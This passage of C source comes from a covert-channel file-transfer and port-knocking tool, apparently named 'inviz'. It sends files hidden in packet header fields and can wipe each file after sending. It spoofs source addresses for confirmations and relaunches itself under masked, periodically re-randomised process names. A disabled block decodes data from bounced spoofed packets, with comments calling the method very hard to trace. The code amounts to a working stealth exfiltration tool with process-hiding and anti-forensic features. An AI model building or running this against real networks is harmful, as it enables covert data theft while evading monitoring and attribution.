                    if (!isbidirectional) {
                        sprintf(logmsg, "sending data: %s trans id %d (%d of %d) %.1lf%% in %.1lf s (%.1lf s remaining)",
                                ch_hex,
                                get_prevtid(),
                                (int)get_filedone(),
                                (int)get_filesize(),
                                ddone,
                                time_snapshot-time_start,
                                dleft);
                    } else {
                        sprintf(logmsg, "sent (%d of %d) %.1lf%% in %.1lf s (%.1lf s remaining)",
                                (int)get_filedone(),
                                (int)get_filesize(),
                                ddone,
                                time_snapshot-time_start,
                                dleft);
                    }
                } else {
                    if (!isbidirectional) {
                        sprintf(logmsg, "sending data: %s trans id %d (%d of %d) %.1lf%% in %.1lf s",
                                ch_hex,
                                get_prevtid(),
                                (int)get_filedone(),
                                (int)get_filesize(),
                                ddone,
                                time_snapshot-time_start);
                    } else {
                        sprintf(logmsg, "sent (%d of %d) %.1lf%% in %.1lf s",
                                (int)get_filedone(),
                                (int)get_filesize(),
                                ddone,
                                time_snapshot-time_start);
                    }
                }
                logit(_LOG_INFO, logmsg, 0);
            }
            spoof_ipid=0;
        } /* end while(fgetc()) loop */
        if (get_pfile() != NULL) {
            fclose(get_pfile());
            set_pfile(NULL);
        }
        //
        if (!confirmationexpired) {
            set_finished(TRUE);
            sprintf(logmsg, "file %s now sent", filename);
            logit(_LOG_INFO, logmsg, 0);
            //
            // now send eof trigger
            // ...
            eof_trigger_sent = TRUE;
            //
            if (get_remove()) {
                //
                // erase file after sending
                //
                iresult = wipe_file((char *)filename);
                //
            } else {
                if (get_verbose()) {
                    sprintf(logmsg, "file %s left in place (not removed)", filename);
                    logit(_LOG_INFO, logmsg, 0);
                }
            }
        }
        if (get_useudp()) {
            if (send_udp_packet.nextlookuphost) {
                free(send_udp_packet.nextlookuphost);
                send_udp_packet.nextlookuphost = NULL;
            }
        }
        //
        // now relaunch !
        //
        char pname[MAX_FILENAME_LEN+1];
        memset(pname, 0x0, sizeof(pname));
        strncpy(pname, get_programname(), MAX_FILENAME_LEN);
        //
        char psname[INVIZ_MAX_PSMASK_LEN+1];
        memset(psname, 0x0, sizeof(psname));
        strncpy(psname, get_originalpsname(), INVIZ_MAX_PSMASK_LEN);
        //
        char verbose_parm[strlen(get_quietparm())+1];
        memset(verbose_parm, 0x0, sizeof(verbose_parm));
        if (get_verbose()) {
            sprintf(verbose_parm, "%s", get_verboseparm());
        } else {
            sprintf(verbose_parm, "%s", get_quietparm());
        }
        //
        char pkprivate_parm[strlen(get_pknotprivateparm())+1];
        memset(pkprivate_parm, 0x0, sizeof(pkprivate_parm));
        if (get_pkprivatesubnet()) {
            sprintf(pkprivate_parm, "%s", get_pkprivateparm());
        } else {
            sprintf(pkprivate_parm, "%s", get_pknotprivateparm());
        }
        //
        char log_parm[strlen(get_uselogfileparm())+1];
        memset(log_parm, 0x0, sizeof(log_parm));
        if (get_uselogfile()) {
            sprintf(log_parm, "%s", get_uselogfileparm());
        } else {
            sprintf(log_parm, "%s", get_nologfileparm());
        }
        //
        char pwd_parm[strlen(get_pkpasswordparm()) + strlen(get_pkpassword()) + 1];
        memset(pwd_parm, 0x0, sizeof(pwd_parm));
        sprintf(pwd_parm, "%s%s", get_pkpasswordparm(), get_pkpassword());
        //
        char if_parm[strlen(get_ifnameparm()) + strlen(get_ifname()) + 1];
        memset(if_parm, 0x0, sizeof(if_parm));
        sprintf(if_parm, "%s%s", get_ifnameparm(), get_ifname());
        //
        cleanup_parms();
        //
        sprintf(logmsg, "now will re-launch to listen for incoming port knocking messages");
        logit(_LOG_INFO, logmsg, 0);
        int ires = execlp(pname,
            psname,
            "--pk="INVIZ_ANY_DESC,
            "--"INVIZ_LOG_DESC,
            pkprivate_parm,
            log_parm,
            verbose_parm,
            if_parm,
            pwd_parm,
            NULL);
        if (ires < 0) {
            sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                errno,
                strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
        }
        return;
    } else {
        //
        /***********************/
        /* Passive server code */
        /***********************/
        //
        /* we are the server so now we listen */
        //
        while (isportknocking && !sig_interrupted) {
            int last_signal;
            //
            // first init the firewall config stuff
            //
            fw_config_init_inviz();
            //
            /* Prepare the firewall - i.e. flush any old rules and (for iptables)
             * create fwknop chains.
            */
            fw_initialize_inviz();
            //
            /* If the TCP server option was set, fire it up here.
            */
            if(get_usetcpserver()) {
                if(get_tcpserverport() < get_mintcpserverport() ||
                        get_tcpserverport() >  get_maxtcpserverport()) {
                    sprintf(logmsg, "unable to start TCP server - invalid port (%i)", get_tcpserverport());
                    logit(_LOG_ERROR, logmsg, 0);
                } else {
                    run_tcp_server_inviz();
                }
            }
            //
            /* Intiate pcap capture mode...
            */
            int bclose_pcap_dev = FALSE;
            iresult = pcap_capture_inviz(bclose_pcap_dev);
            //
            if(got_signal) {
                last_signal = got_signal;
                got_signal = FALSE;
                if(got_sighup) {
                    sprintf(logmsg, "got SIGHUP so re-reading configs...");
                    logit(_LOG_WARNING, logmsg, 0);
                    kill(get_tcpserverpid(), SIGTERM);
                    usleep(1000000); // ?!
                    got_sighup = FALSE;
                } else if(got_sigint) {
                    sprintf(logmsg, "got SIGINT so exiting...");
                    logit(_LOG_WARNING, logmsg, 0);
                    got_sigint = FALSE;
                    break;
                } else if(got_sigterm) {
                    sprintf(logmsg, "got SIGTERM so exiting...");
                    logit(_LOG_WARNING, logmsg, 0);
                    got_sigterm = FALSE;
                    break;
                } else if (got_sigalrm) {
                    sprintf(logmsg, "got SIGALRM so not exiting...");
                    logit(_LOG_INFO, logmsg, 0);
                    got_sigalrm = FALSE;
                    continue; // cycle back?
                } else {
                    sprintf(logmsg, "got unexpected signal (%i) so exiting...",
                            last_signal);
                    logit(_LOG_WARNING, logmsg, 0);
                    break;
                }
            } else if (sig_interrupted) {
                break;
            } else if ( (get_ipacketlimit() > 0) && (get_ipackets() >= get_ipacketlimit()) ) {
                sprintf(logmsg, "incoming packet capture count limit (%d) reached so exiting...",
                        get_ipacketlimit());
                logit(_LOG_INFO, logmsg, 0);
                break;
            } else {
                /* got_signal was not set (should be if we are here) */
                sprintf(logmsg, "unexpected end to incoming packet capture (no signal received)");
                logit(_LOG_WARNING, logmsg, 0);
                break;
            }
            //
            // now re-launch?
            //
            char pname[MAX_FILENAME_LEN+1];
            memset(pname, 0x0, sizeof(pname));
            strncpy(pname, get_programname(), MAX_FILENAME_LEN);
            //
            char psname[INVIZ_MAX_PSMASK_LEN+1];
            memset(psname, 0x0, sizeof(psname));
            strncpy(psname, get_originalpsname(), INVIZ_MAX_PSMASK_LEN);
            //
            char verbose_parm[strlen(get_quietparm())+1];
            memset(verbose_parm, 0x0, sizeof(verbose_parm));
            if (get_verbose()) {
                sprintf(verbose_parm, "%s", get_verboseparm());
            } else {
                sprintf(verbose_parm, "%s", get_quietparm());
            }
            //
            char pkprivate_parm[strlen(get_pknotprivateparm())+1];
            memset(pkprivate_parm, 0x0, sizeof(pkprivate_parm));
            if (get_pkprivatesubnet()) {
                sprintf(pkprivate_parm, "%s", get_pkprivateparm());
            } else {
                sprintf(pkprivate_parm, "%s", get_pknotprivateparm());
            }
            //
            char log_parm[strlen(get_uselogfileparm())+1];
            memset(log_parm, 0x0, sizeof(log_parm));
            if (get_uselogfile()) {
                sprintf(log_parm, "%s", get_uselogfileparm());
            } else {
                sprintf(log_parm, "%s", get_nologfileparm());
            }
            //
            char pwd_parm[strlen(get_pkpasswordparm()) + strlen(get_pkpassword()) + 1];
            memset(pwd_parm, 0x0, sizeof(pwd_parm));
            sprintf(pwd_parm, "%s%s", get_pkpasswordparm(), get_pkpassword());
            //
            char if_parm[strlen(get_ifnameparm()) + strlen(get_ifname()) + 1];
            memset(if_parm, 0x0, sizeof(if_parm));
            sprintf(if_parm, "%s%s", get_ifnameparm(), get_ifname());
            //
            cleanup_parms();
            //
            sprintf(logmsg, "now will re-launch to listen for incoming port knocking messages");
            logit(_LOG_INFO, logmsg, 0);
            int ires = execlp(pname,
                psname,
                "--pk="INVIZ_ANY_DESC,
                pkprivate_parm,
                log_parm,
                verbose_parm,
                pwd_parm,
                if_parm,
                NULL);
            if (ires < 0) {
                sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                    errno,
                    strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
            }
            return;
        }
        if (isportknocking) {
            if (get_verbose()) {
                sprintf(logmsg, "shutting down port knocking server");
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            /* Kill the TCP server (if we have one running).
            */
            if(get_tcpserverpid() > 0) {
                sprintf(logmsg, "killing the TCP server (pid %i)", get_tcpserverpid());
                logit(_LOG_INFO, logmsg, 0);
                kill(get_tcpserverpid(), SIGTERM);
                //
                /* --DSS XXX: This seems to be necessary if the tcp server
                 *            was restarted by this program.  We need to
                 *            investigate an fix this. For now, this works
                 *            (it is kludgy, but does no harm afaik).
                */
                kill(get_tcpserverpid(), SIGKILL);
            }
            //
            fw_cleanup_inviz();
            return;
        } // isportknocking
        //
        // isfiletransfer and receiving on server
        //
        if (get_pfile()) {
            fclose(get_pfile());
            set_pfile(NULL);
        }
        if (get_append()) {
            // file received is to be added to existing file
            set_pfile( fopen(filename, "ab") );
        } else {
            // file received is to
            set_pfile( fopen(filename, "wb") );
        }
        if (get_pfile() == NULL) {
            sprintf(logmsg, "unable to open file (%s) for writing [%s]",
                    filename,
                    strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        fclose(get_pfile()); // not leaving file open - will reopen later when writing
        set_pfile(NULL);
    	//
    	// now start the pcap/capture session
        //
        int recv_chars;
        if (isbidirectional) {
            // if sending back confirmation packets
            // then break after this number of packets
            // instead of after get_recvbufferlen() packets
            recv_chars = get_iconfirminterval();
        } else {
            recv_chars = get_recvbufferlen();
        }
        while (TRUE) {
            pcap_recv_index = 0;
            //
            // handle_IP now saves received data to pcap_recv_buffer
            // up to recv_chars at a time
            // and counts chars in pcap_recv_buffer via pcap_recv_index
            //
            pcap_loop(get_pcapstruct(), recv_chars, pcap_server_packet_callback, args);
            //
            //
            //
            if (get_randomizepsmask() && (INVIZ_PSMASK_TIMER > 0)) {
                gettimeofday(&tprun, NULL);
                time_snapshot = tprun.tv_sec+(tprun.tv_usec/1000000.0);
                if ((time_snapshot - get_randomizepstimer()) >= (double)INVIZ_PSMASK_TIMER) {
                    // reset random process mask
                    set_randompsmask();
                    if (get_verbose()) {
                        sprintf(logmsg, "invizible process %i now masked as %s",
                                (int)getpid(),
                                (char *)get_psmask());
                        logit(_LOG_INFO, logmsg, 0);
                    }
                }
            }
            //
            if (pcap_recv_index == 0) {
                // nothing received
                // go back and try again
                continue;
            }
            //
            if (isbidirectional) {
                // send back confirmation to client!
                // if client expects confirmation and does not receive it
                // then it will not send any further packets to server
                if (get_useudp()) {
                    //
                    // datapayload should be populated and ready to send
                    //
                    /* ensure raw socket is open for sending confirmation */
                    //
                    send_udp_packet.ip.saddr = source_addr; // spoofed
                    send_udp_packet.ip.daddr = dest_addr; // originating client
                    //
                    sockraw = get_sockraw();
                    opt_listenmode = FALSE;
                    send_udp();
                    if (get_verbose()) {
                        sprintf(logmsg, "confirmation now sent to %s port %d ...",
                                (char *)get_clientip4(),
                                dst_port);
                        logit(_LOG_INFO, logmsg, 0);
                    }
                    opt_listenmode = TRUE;
                } else {
                    sprintf(logmsg, "confirmation packets only supported for udp at this time");
                    logit(_LOG_WARNING, logmsg, 0);
                }
            }
            //
            // write pcap_recv_buffer to file then loop back to get more
            //
            set_pfile( fopen(filename, "ab") ); // append, binary
            if (get_pfile()) {
                //iwritten = fwrite(pcap_recv_buffer, sizeof(char), (size_t)pcap_recv_index, output);
                if (get_verbose()) {
                    sprintf(logmsg, "now writing %d bytes to received %s file on disk...",
                            pcap_recv_index,
                            filename);
                    logit(_LOG_INFO, logmsg, 0);
                }
                for (c=0; c < pcap_recv_index; c++) {
                    //fputc(output ...
                    fprintf(get_pfile(), "%c", (char)pcap_recv_buffer[c]);
                    fflush(get_pfile());
                }
                if (get_verbose()) {
                    long lsize = 0;
                    fseek(get_pfile(), 0, SEEK_END);
                    if (!ferror(get_pfile())) {
                        lsize = ftell(get_pfile());
                        sprintf(logmsg, "received %s file size now %.0lf bytes",
                            filename,
                            (double)lsize);
                        logit(_LOG_INFO, logmsg, 0);
                    }
                }
                fclose(get_pfile());
                set_pfile(NULL);
                if (get_finished()) {
                    break;
                }
            }
        }
        //
        char pname[MAX_FILENAME_LEN+1];
        memset(pname, 0x0, sizeof(pname));
        strncpy(pname, get_programname(), MAX_FILENAME_LEN);
        //
        char psname[INVIZ_MAX_PSMASK_LEN+1];
        memset(psname, 0x0, sizeof(psname));
        strncpy(psname, get_originalpsname(), INVIZ_MAX_PSMASK_LEN);
        //
        char verbose_parm[strlen(get_quietparm())+1];
        memset(verbose_parm, 0x0, sizeof(verbose_parm));
        if (get_verbose()) {
            sprintf(verbose_parm, "%s", get_verboseparm());
        } else {
            sprintf(verbose_parm, "%s", get_quietparm());
        }
        //
        char pkprivate_parm[strlen(get_pknotprivateparm())+1];
        memset(pkprivate_parm, 0x0, sizeof(pkprivate_parm));
        if (get_pkprivatesubnet()) {
            sprintf(pkprivate_parm, "%s", get_pkprivateparm());
        } else {
            sprintf(pkprivate_parm, "%s", get_pknotprivateparm());
        }
        //
        char log_parm[strlen(get_uselogfileparm())+1];
        memset(log_parm, 0x0, sizeof(log_parm));
        if (get_uselogfile()) {
            sprintf(log_parm, "%s", get_uselogfileparm());
        } else {
            sprintf(log_parm, "%s", get_nologfileparm());
        }
        //
        char pwd_parm[strlen(get_pkpasswordparm()) + strlen(get_pkpassword()) + 1];
        memset(pwd_parm, 0x0, sizeof(pwd_parm));
        sprintf(pwd_parm, "%s%s", get_pkpasswordparm(), get_pkpassword());
        //
        char if_parm[strlen(get_ifnameparm()) + strlen(get_ifname()) + 1];
        memset(if_parm, 0x0, sizeof(if_parm));
        sprintf(if_parm, "%s%s", get_ifnameparm(), get_ifname());
        //
        cleanup_parms();
        //
        // end of incoming file transfer - what next?
        //
        sprintf(logmsg, "now will re-launch to listen for incoming port knocking messages");
        logit(_LOG_INFO, logmsg, 0);
        int ires = execlp(pname,
            psname,
            "--pk="INVIZ_ANY_DESC,
            log_parm,
            pkprivate_parm,
            verbose_parm,
            pwd_parm,
            if_parm,
            NULL);
        if (ires < 0) {
            sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                errno,
                strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
        }
        return;
        //
#ifdef HPING_WIHOUT_PCAP
        //
        /* Now we read the socket. This is not terribly fast at this time, and has the same */
        /* reliability as UDP as we do not ACK the packets for retries if they are bad. */
        /* This is just proof of concept... CHR*/
        //
        while(get_usetcp()) {
            //
            /* read packet loop */
            //
            /* Open socket for reading */
            //
            recv_socket = socket(AF_INET, SOCK_RAW, 6);
            if( recv_socket < 0 ) {
                sprintf(logmsg, "receive socket cannot be opened [%s]", strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
            //
            /* Listen for return packet on a passive socket */
            //
            read(recv_socket, (struct recv_tcp *)&recv_tcp_packet, (int)(RECEIVE_PACKET_SIZE-1));
            //
            /* if the packet has the SYN/ACK flag set and is from the right address..*/
            //
            if (source_port == 0) {
                //
                /* the user does not care what port we come from */
                /* check for SYN/ACK flag set and correct inbound IP source address */
                //
  		if((recv_tcp_packet.tcp.syn == 1) && (recv_tcp_packet.ip.saddr == dns_addr)) {
                    //
                    /* IP ID header "decoding" */
                    /* The ID number is converted from it's ASCII equivalent back to normal */
                    //
                    if(ipid==1) {
                        if (get_verbose()) {
                            sprintf(logmsg, "receiving data: %c", recv_tcp_packet.ip.id);
                            logit(_LOG_INFO, logmsg, 0);
                        }
   			fprintf(output,"%c", recv_tcp_packet.ip.id);
   			fflush(output);
                    } else if (seq==1) {
                        //
                        /* IP Sequence number "decoding" */
                        //
                        if (get_verbose()) {
                            sprintf(logmsg, "receiving data: %c", recv_tcp_packet.tcp.seq);
                            logit(_LOG_INFO, logmsg, 0);
                        }
			fprintf(output,"%c", recv_tcp_packet.tcp.seq);
   			fflush(output);
                    } else if (ack==1) {
                        //
                        /* Use a bounced packet from a remote server to decode the data */
                        /* This technique requires that the client initiates a SEND to */
                        /* a remote host with a SPOOFED source IP that is the location */
                        /* of the listening server. The remote server will receive the packet */
                        /* and will initiate an ACK of the packet with the encoded sequence */
                        /* number+1 back to the SPOOFED source. The covert server is waiting at this */
                        /* spoofed address and can decode the ack field to retrieve the data */
                        /* this enables an "anonymous" packet transfer that can bounce */
                        /* off any site. This is VERY hard to trace back to the originating */
                        /* source. This is pretty nasty as far as covert channels go... */
                        /* Some routers may not allow you to spoof an address outbound */
                        /* that is not on their network, so it may not work at all sites... */
                        /* SENDER should use covert_tcp with the -seq flag and a forged -source */
                        /* address. RECEIVER should use the -server -ack flags with the IP of */
                        /* of the server the bounced message will appear from.. CHR */
                        //
                        /* The bounced ACK sequence number is really the original sequence*/
                        /* plus one (ISN+1). However, the translation here drops some of the */
                        /* bits so we get the original ASCII value...go figure.. */
                        //
                        if (get_verbose()) {
                            sprintf(logmsg, "receiving data: %c", recv_tcp_packet.tcp.ack_seq);
                            logit(_LOG_INFO, logmsg, 0);
                        }
                        fprintf(output,"%c", recv_tcp_packet.tcp.ack_seq);
                        fflush(output);
                    }
		} /* end if loop to check for ID/sequence decode */
            } else {
                //
                /* if the packet has the SYN/ACK flag set and is destined to the right port..*/
                /* we'll grab it regardless if IP addresses. This is useful for bouncing off of */
                /* multiple hosts to a single server address */
                //
                if( (recv_tcp_packet.tcp.syn==1) && (ntohs(recv_tcp_packet.tcp.dest) == source_port) ) {
                    //
                    /* IP ID header "decoding" */
                    /* The ID number is converted from it's ASCII equivalent back to normal */
                    //
                    if(ipid==1) {
                        if (get_verbose()) {
                            sprintf(logmsg, "receiving data: %c", recv_tcp_packet.ip.id);
                            logit(_LOG_INFO, logmsg, 0);
                        }
   			fprintf(output,"%c", recv_tcp_packet.ip.id);
   			fflush(output);
                    } else if (seq==1) {
                        //
        		/* IP Sequence number "decoding" */
			//
                        if (get_verbose()) {
                            sprintf(logmsg, "receiving data: %c", recv_tcp_packet.tcp.seq);
                            logit(_LOG_INFO, logmsg, 0);
                        }
			fprintf(output,"%c", recv_tcp_packet.tcp.seq);
   			fflush(output);
                    } else if (ack==1) {
                        //
			/* Do the bounce decode again... */
			//
                        if (get_verbose()) {
                            sprintf(logmsg, "receiving data: %c", recv_tcp_packet.tcp.ack_seq);
                            logit(_LOG_INFO, logmsg, 0);
                        }
			fprintf(output,"%c", recv_tcp_packet.tcp.ack_seq);
   			fflush(output);
                    }
	 	} /* end if loop to check for source port decoding */
            } /* end else loop to see if port number given to listen on */
            //
            close(recv_socket); /* close the socket so we don't hose the kernel */
        }/* end while() read packet loop */
        //
        fclose(output);
#endif
    } /* end else(serverloop) function */
}
//
/* Tell them how to use this */
//
void
usage(char * progname) {
    printf("usage as client: \n%s --mode=client [--useip6=1] --serverip4=xx.xx.xx.xx [--dnsip4=xx.xx.xx.xx] --file=xxxxx [--seed=nnn] [--verbose] [--remove]\n\n", progname);
    printf("--mode=client               - required\n");
    printf("--file=xxxxx                - required to specify file name to transfer\n");
    printf("--remove                    - optional to delete file after sending\n");
    printf("--useip4=0                 - optional to specify not using ip4\n");
    printf("--useip6=1                 - optional to specify using ip6\n");
    printf("--serverip4=xx.xx.xx.xx    - required to specify destination server ip4 address\n");
    printf("--dnsip4=xx.xx.xx.xx       - optional to specify DNS server other than default 208.67.222.222\n");
    printf("--verbose                   - optional to include more detailed messages\n");
    printf("--sleepmax=nn               - optional to specify max seconds delay between lookups other than default 60 seconds\n");
    printf("--seed=nnn                  - optional to specify seed number other than default 0 (must match server-side)\n");
    printf("\n");
    printf("usage as server: \n%s --mode=server [--useip6=1] --file=xxxxx [--seed=nnn] [--verbose] [--replace] [--append]\n\n", progname);
    printf("--mode=server               - required\n");
    printf("--file=xxxxx                - required to specify name of file to receive from client\n");
    printf("--replace                   - optional to replace existing file\n");
    printf("--append                    - optional to append to existing file\n");
    printf("--useip4=0                 - optional to specify not using ip4\n");
    printf("--useip6=1                 - optional to specify using ip6\n");
    printf("--verbose                   - optional to include more detailed messages\n");
    printf("--seed=nnn                  - optional to specify seed number other than default 0 (must match client-side)\n");
}
